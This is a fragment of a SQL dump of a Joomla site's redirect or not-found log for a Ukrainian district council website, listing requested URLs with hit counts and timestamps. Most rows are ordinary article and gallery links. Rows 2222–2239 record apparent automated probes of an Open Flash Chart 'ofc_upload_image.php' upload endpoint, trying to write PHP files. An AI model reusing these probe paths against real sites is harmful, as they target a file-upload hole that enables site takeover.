00:00:00',301),(2145,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1203:-2014-&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%9F%D0%9A%D0%9C%D0%A3+%E2%84%9695+%D0%B2%D1%96%D0%B4+25.03.2014%D0%B2%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0','',3,0,'2014-09-18 09:35:00','0000-00-00 00:00:00',301),(2146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-18 09:35:11','0000-00-00 00:00:00',301),(2147,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-18 09:38:29','0000-00-00 00:00:00',301),(2148,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54&Itemid=95&lang=uk','','','',6,0,'2014-09-18 09:39:02','0000-00-00 00:00:00',301),(2149,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-18 09:39:04','0000-00-00 00:00:00',301),(2150,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57:--15042014-&Itemid=98&lang=uk','','','',7,0,'2014-09-18 09:39:18','0000-00-00 00:00:00',301),(2151,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=uk','','','',8,0,'2014-09-18 09:39:31','0000-00-00 00:00:00',301),(2152,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10&Itemid=17&lang=uk','','','',9,0,'2014-09-18 09:39:33','0000-00-00 00:00:00',301),(2153,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=1&lang=uk','','','',7,0,'2014-09-18 09:39:34','0000-00-00 00:00:00',301),(2154,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=uk','','','',7,0,'2014-09-18 09:39:36','0000-00-00 00:00:00',301),(2155,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=uk','','','',6,0,'2014-09-18 09:39:41','0000-00-00 00:00:00',301),(2156,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-18 09:39:55','0000-00-00 00:00:00',301),(2157,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58:--30042014-&Itemid=105&lang=ru','','','',7,0,'2014-09-18 10:14:20','0000-00-00 00:00:00',301),(2158,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-18 10:17:57','0000-00-00 00:00:00',301),(2159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-18 10:27:02','0000-00-00 00:00:00',301),(2160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36&Itemid=70&lang=en','','','',10,0,'2014-09-18 10:27:35','0000-00-00 00:00:00',301),(2161,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-18 10:28:49','0000-00-00 00:00:00',301),(2162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-18 10:34:50','0000-00-00 00:00:00',301),(2163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-18 10:35:18','0000-00-00 00:00:00',301),(2164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46:--21122012&Itemid=85&lang=uk','','','',10,0,'2014-09-18 10:35:28','0000-00-00 00:00:00',301),(2165,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=en','','','',4,0,'2014-09-18 10:38:16','0000-00-00 00:00:00',301),(2166,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-18 10:38:18','0000-00-00 00:00:00',301),(2167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=uk','','','',6,0,'2014-09-18 10:45:49','0000-00-00 00:00:00',301),(2168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59&Itemid=107&lang=uk','','','',6,0,'2014-09-18 10:45:52','0000-00-00 00:00:00',301),(2169,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-------2015-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-18 10:46:38','0000-00-00 00:00:00',301),(2170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51&Itemid=92&lang=uk','','','',13,0,'2014-09-18 10:49:12','0000-00-00 00:00:00',301),(2171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-18 11:18:31','0000-00-00 00:00:00',301),(2172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57:--15042014-&Itemid=98&lang=en','','https://www.google.com.ua/','',9,0,'2014-09-18 11:19:25','0000-00-00 00:00:00',301),(2173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&Itemid=14&lang=ru','','https://www.google.com.ua/','',7,0,'2014-09-18 11:42:00','0000-00-00 00:00:00',301),(2174,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-18 11:50:23','0000-00-00 00:00:00',301),(2175,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51:--19072013-&Itemid=92&lang=uk','','','',10,0,'2014-09-18 12:08:00','0000-00-00 00:00:00',301),(2176,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1343:2014-06-14-17-26-47&tmpl=component&print=1&layout=default&page=&lang=uk','','','',4,0,'2014-09-18 12:24:26','0000-00-00 00:00:00',301),(2177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-18 12:30:05','0000-00-00 00:00:00',301),(2178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-18 12:34:35','0000-00-00 00:00:00',301),(2179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-18 12:36:59','0000-00-00 00:00:00',301),(2180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-18 12:50:00','0000-00-00 00:00:00',301),(2181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59:--20062014-&Itemid=107&lang=uk','','','',5,0,'2014-09-18 12:51:51','0000-00-00 00:00:00',301),(2182,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59&Itemid=107&lang=en','','','',6,0,'2014-09-18 13:04:32','0000-00-00 00:00:00',301),(2183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51&Itemid=92&lang=ru','','','',13,0,'2014-09-18 13:08:00','0000-00-00 00:00:00',301),(2184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46&Itemid=85&lang=ru','','','',4,0,'2014-09-18 13:09:16','0000-00-00 00:00:00',301),(2185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-18 13:10:37','0000-00-00 00:00:00',301),(2186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-18 13:14:32','0000-00-00 00:00:00',301),(2187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51&Itemid=92&lang=uk','','','',16,0,'2014-09-18 13:18:42','0000-00-00 00:00:00',301),(2188,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49&Itemid=88&lang=en','','','',7,0,'2014-09-18 13:21:17','0000-00-00 00:00:00',301),(2189,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-18 13:21:22','0000-00-00 00:00:00',301),(2190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=uk','','','',7,0,'2014-09-18 13:22:47','0000-00-00 00:00:00',301),(2191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=uk','','','',7,0,'2014-09-18 13:24:37','0000-00-00 00:00:00',301),(2192,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36&Itemid=70&lang=uk','','','',5,0,'2014-09-18 13:25:33','0000-00-00 00:00:00',301),(2193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=uk','','','',8,0,'2014-09-18 13:27:55','0000-00-00 00:00:00',301),(2194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-09-18 13:31:54','0000-00-00 00:00:00',301),(2195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-18 13:32:25','0000-00-00 00:00:00',301),(2196,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=uk','','','',15,0,'2014-09-18 13:34:11','0000-00-00 00:00:00',301),(2197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59:--20062014-&Itemid=107&lang=uk','','','',18,0,'2014-09-18 14:20:06','0000-00-00 00:00:00',301),(2198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:------------2010-2015-&catid=36&Itemid=70&lang=ru','','','',9,0,'2014-09-18 14:20:23','0000-00-00 00:00:00',301),(2199,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47&Itemid=86&lang=uk','','','',4,0,'2014-09-18 14:26:31','0000-00-00 00:00:00',301),(2200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57:--15042014-&Itemid=98&lang=uk','','','',8,0,'2014-09-18 14:30:46','0000-00-00 00:00:00',301),(2201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=uk','','','',7,0,'2014-09-18 14:42:29','0000-00-00 00:00:00',301),(2202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-18 14:47:02','0000-00-00 00:00:00',301),(2203,'http://www.malyn-rayrada.org.ua/index.php/854-vitaemo-iz-dnem-nezalezhnosti-ukraini','','','',2,0,'2014-09-18 15:02:22','0000-00-00 00:00:00',301),(2204,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-18 15:03:16','0000-00-00 00:00:00',301),(2205,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-18 15:14:53','0000-00-00 00:00:00',301),(2206,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-18 15:27:15','0000-00-00 00:00:00',301),(2207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-18 15:27:27','0000-00-00 00:00:00',301),(2208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-18 15:32:49','0000-00-00 00:00:00',301),(2209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',18,0,'2014-09-18 15:49:01','0000-00-00 00:00:00',301),(2210,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-18 15:51:32','0000-00-00 00:00:00',301),(2211,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=0&lang=ru','','','',3,0,'2014-09-18 16:15:34','0000-00-00 00:00:00',301),(2212,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1335:2014-06-07-10-58-30&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-18 16:41:09','0000-00-00 00:00:00',301),(2213,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-18 17:02:32','0000-00-00 00:00:00',301),(2214,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-18 17:05:53','0000-00-00 00:00:00',301),(2215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-18 17:32:02','0000-00-00 00:00:00',301),(2216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-18 17:33:19','0000-00-00 00:00:00',301),(2217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=en','','','',7,0,'2014-09-18 17:34:31','0000-00-00 00:00:00',301),(2218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:-qq&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-18 17:35:47','0000-00-00 00:00:00',301),(2219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',9,0,'2014-09-18 17:42:26','0000-00-00 00:00:00',301),(2220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-18 17:42:31','0000-00-00 00:00:00',301),(2221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57&Itemid=98&lang=en','','','',9,0,'2014-09-18 17:42:58','0000-00-00 00:00:00',301),(2222,'http://www.malyn-rayrada.org.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=itil.php','','','',1,0,'2014-09-18 18:05:52','0000-00-00 00:00:00',301),(2223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-18 18:25:25','0000-00-00 00:00:00',301),(2224,'http://malyn-rayrada.org.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=itil.php','','','',1,0,'2014-09-18 18:25:45','0000-00-00 00:00:00',301),(2225,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',2,0,'2014-09-18 20:26:34','0000-00-00 00:00:00',301),(2226,'http://www.malyn-rayrada.org.ua/admin/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:26:40','0000-00-00 00:00:00',301),(2227,'http://www.malyn-rayrada.org.ua/cgi-bin/awstats/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:26:46','0000-00-00 00:00:00',301),(2228,'http://www.malyn-rayrada.org.ua//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:26:52','0000-00-00 00:00:00',301),(2229,'http://www.malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:00','0000-00-00 00:00:00',301),(2230,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:07','0000-00-00 00:00:00',301),(2231,'http://www.malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:14','0000-00-00 00:00:00',301),(2232,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:20','0000-00-00 00:00:00',301),(2233,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:27','0000-00-00 00:00:00',301),(2234,'http://www.malyn-rayrada.org.ua/admin_area/charts/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:33','0000-00-00 00:00:00',301),(2235,'http://www.malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:39','0000-00-00 00:00:00',301),(2236,'http://www.malyn-rayrada.org.ua//administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:45','0000-00-00 00:00:00',301),(2237,'http://www.malyn-rayrada.org.ua//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:52','0000-00-00 00:00:00',301),(2238,'http://www.malyn-rayrada.org.ua//administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:27:59','0000-00-00 00:00:00',301),(2239,'http://www.malyn-rayrada.org.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=lib32.php','','','',1,0,'2014-09-18 20:28:06','0000-00-00 00:00:00',301),(2240,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=880:2012-12-21-17-03-54&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%B7%D0%BC%D1%96%D0%BD%D0%B0+%D1%88%D1%82%D0%B0%D1%82%D0%BD%D0%BE%D0%B3%D0%BE+%D1%80%D0%BE%D0%B7%D0%BF%D0%B8%D1%81%D1%83+','',2,0,'2014-09-18 20:42:05','0000-00-00 00:00:00',301),(2241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',18,0,'2014-09-18 21:06:38','0000-00-00 00:00:00',301),(2242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51:--19072013-&Itemid=92&lang=ru','','','',8,0,'2014-09-18 21:38:20','0000-00-00 00:00:00',301),(2243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49&Itemid=88&lang=uk','','','',20,0,'2014-09-18 21:39:41','0000-00-00 00:00:00',301),(2244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-18 21:45:42','0000-00-00 00:00:00',301),(2245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59&Itemid=107&lang=uk','','','',7,0,'2014-09-18 21:48:46','0000-00-00 00:00:00',301),(2246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-18 21:54:24','0000-00-00 00:00:00',301),(2247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-18 21:54:46','0000-00-00 00:00:00',301),(2248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-18 21:54:57','0000-00-00 00:00:00',301),(2249,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-18 22:17:35','0000-00-00 00:00:00',301),(2250,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-18 22:20:46','0000-00-00 00:00:00',301),(2251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56:--03022014-&Itemid=97&lang=uk','','','',19,0,'2014-09-18 22:32:00','0000-00-00 00:00:00',301),(2252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',30,0,'2014-09-18 22:36:14','0000-00-00 00:00:00',301),(2253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',30,0,'2014-09-18 22:40:03','0000-00-00 00:00:00',301),(2254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-18 22:42:36','0000-00-00 00:00:00',301),(2255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-18 22:46:12','0000-00-00 00:00:00',301),(2256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-18 23:26:17','0000-00-00 00:00:00',301),(2257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46&Itemid=85&lang=uk','','','',10,0,'2014-09-18 23:33:28','0000-00-00 00:00:00',301),(2258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56:--03022014-&Itemid=97&lang=uk','','','',7,0,'2014-09-18 23:34:25','0000-00-00 00:00:00',301),(2259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51&Itemid=92&lang=uk','','','',11,0,'2014-09-18 23:36:16','0000-00-00 00:00:00',301),(2260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53&Itemid=94&lang=uk','','','',11,0,'2014-09-18 23:37:10','0000-00-00 00:00:00',301),(2261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-18 23:41:51','0000-00-00 00:00:00',301),(2262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-18 23:49:16','0000-00-00 00:00:00',301),(2263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46&Itemid=85&lang=uk','','','',11,0,'2014-09-18 23:55:49','0000-00-00 00:00:00',301),(2264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57&Itemid=98&lang=uk','','','',6,0,'2014-09-18 23:58:30','0000-00-00 00:00:00',301),(2265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-19 00:02:15','0000-00-00 00:00:00',301),(2266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56&Itemid=97&lang=uk','','','',8,0,'2014-09-19 00:04:21','0000-00-00 00:00:00',301),(2267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47&Itemid=86&lang=uk','','','',12,0,'2014-09-19 00:07:44','0000-00-00 00:00:00',301),(2268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-19 00:11:11','0000-00-00 00:00:00',301),(2269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-19 00:14:16','0000-00-00 00:00:00',301),(2270,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-19 00:18:34','0000-00-00 00:00:00',301),(2271,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10&Itemid=17&lang=en','','','',8,0,'2014-09-19 00:21:39','0000-00-00 00:00:00',301),(2272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-19 00:21:56','0000-00-00 00:00:00',301),(2273,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59&Itemid=107&lang=en','','','',9,0,'2014-09-19 00:24:04','0000-00-00 00:00:00',301),(2274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47&Itemid=86&lang=uk','','','',16,0,'2014-09-19 00:27:21','0000-00-00 00:00:00',301),(2275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-19 00:28:31','0000-00-00 00:00:00',301),(2276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-19 00:28:47','0000-00-00 00:00:00',301),(2277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51&Itemid=92&lang=en','','','',7,0,'2014-09-19 00:29:26','0000-00-00 00:00:00',301),(2278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-19 00:29:26','0000-00-00 00:00:00',301),(2279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',13,0,'2014-09-19 00:33:06','0000-00-00 00:00:00',301),(2280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56&Itemid=97&lang=ru','','','',13,0,'2014-09-19 00:37:34','0000-00-00 